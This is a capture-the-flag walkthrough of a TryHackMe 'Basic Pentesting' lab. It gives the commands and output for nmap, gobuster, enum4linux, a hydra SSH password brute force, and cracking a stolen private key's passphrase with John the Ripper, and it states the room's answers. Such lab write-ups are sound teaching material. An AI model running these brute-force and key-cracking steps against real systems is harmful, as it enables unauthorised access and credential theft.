[CTF] Tryhackme - Basic Pentesting
Tasks
- Find the services exposed by the machine
- What is the name of the hidden directory on the web server(enter name without /)?
- User brute-forcing to find the username & password
- What is the username?
- What is the password?
- What service do you use to access the server(answer in abbreviation in all caps)?
- Enumerate the machine to find any vectors for privilege escalation
- What is the name of the other user you found(all lower case)?
- If you have found another user, what can you do with this information?
- What is the final password you obtain?
Find the services exposed by the machine
We can check services via nmap.
Lets try it.
nmap -sC -sV
-sC= run all default scripts-sV= find the version of the services
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
─$ nmap -sC -sV 10.10.52.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 17:47 CST
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 17:49 (0:00:30 remaining)
Nmap scan report for 10.10.52.207
Host is up (0.23s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http-proxy
|_http-title: Apache Tomcat/9.0.7
| fingerprint-strings:
| LPDString, X11Probe:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Tue, 10 Sep 2024 09:49:44 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
We closed this question with our scan. We can see all services and versions of it.
What is the name of the hidden directory on the web server(enter name without /)?
For checking hidden directories we use gobuster and add a wordlist. Kali Linux has a standard wordlist in seclist. I use a small version out of github.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ gobuster -w ./Downloads/common.txt dir -u 10.10.52.207
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.52.207
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ./Downloads/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 318] [--> http://10.10.52.207/development/]
Progress: 1942 / 1943 (99.95%)
===============================================================
Finished
===============================================================
We found the directory /development.
Answer: development
User brute-forcing to find the username & password
First we check what we have in /development.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(admin㉿PREDATOR-01)-[~]
└─$ curl http://10.10.52.207/development/j.txt
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
┌──(admin㉿PREDATOR-01)-[~]
└─$ curl http://10.10.52.207/development/dev.txt
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
┌──(admin㉿PREDATOR-01)-[~]
Interesting, we have two persons (K and J). In our nmap scan we found out, that there is a SMB server configured and open (Ports 139 and 445)
We can use enum4linuxfor enumerating data from Windows and Samba hosts.
https://www.kali.org/tools/enum4linux/
We dont need parameter here, just use enum4linux IPTARGET
1
2
3
4
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Perfect, we found two users.
Answer: jan
What is the password?
https://www.kali.org/tools/hydra/
For bruteforce the password, we use hydra.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ hydra -l jan -P rockyou.txt ssh://10.10.52.207
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-10 18:34:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.52.207:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
[ERROR] Can not create restore file (./hydra.restore) - Permission denied
[22][ssh] host: 10.10.52.207 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-10 18:41:11
We found our password.
Password: armando
What service do you use to access the server(answer in abbreviation in all caps)?
We used this service before to crack the password. It is SSH on Port 22.
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
Okay we need to find other vectors. We connect via ssh into Jans account and check if we find something there.
If we navigate a bit we can find the folder from kay. There is a .bak file which we cant open. But there is also a private key hidden (Use ls-la).
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
We copy the private key and try to connect via ssh in his account.
1
2
3
4
5
6
7
8
9
└─$ ssh kay@10.10.52.207 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kay@10.10.52.207's password:
Okay we have to change the permissions of our copied private key via chmod. But it seems that the user kay need a password (The private key is password protected). So we have to crack the password with another wordlist.
For cracking I use John The Ripper.
First we have to bring the private key into the correct form (John Form). We do that with
ssh2john id_rsa.txt >decrypt.txt
Afterwards we try to crack the password via john and add our wordlist from hydra.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(admin㉿PREDATOR-01)-[/usr/share/wordlists]
└─$ john --wordlist=./rockyou.txt ~/decrypt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (/home/admin/id_rsa)
1g 0:00:00:00 DONE (2024-09-10 19:07) 25.00g/s 2068Kp/s 2068Kc/s 2068KC/s catana..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
And the password is beeswax. Lets connect kay via ssh.
ssh kay@TARGET -i id_rsa.txt
We are connected. Last step, check the file:
1
2
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
And we have our final answer:
Password: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
What is the final password you obtain?
Password: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Thoughts:
It is called Basis Pentesting, but you have to be familiar with some tools to solve this level. What did we learn?
- using
hydrafor cracking passwords - using
johnfor cracking passwords out of keys - using
gobusterfor find directories - using
enum4linuxfor find information about SMB and Samba - using
nmapto find services and open ports
Hope you liked it.